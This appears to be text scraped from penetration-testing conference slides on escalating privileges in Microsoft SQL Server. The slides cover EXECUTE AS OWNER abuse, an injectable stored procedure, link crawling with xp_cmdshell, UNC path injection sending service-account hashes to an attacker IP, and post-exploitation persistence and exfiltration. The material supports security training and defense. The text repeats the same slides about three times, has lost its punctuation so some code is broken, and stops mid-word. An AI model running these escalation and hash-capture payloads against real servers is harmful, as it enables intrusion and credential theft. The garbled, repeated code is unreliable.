Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
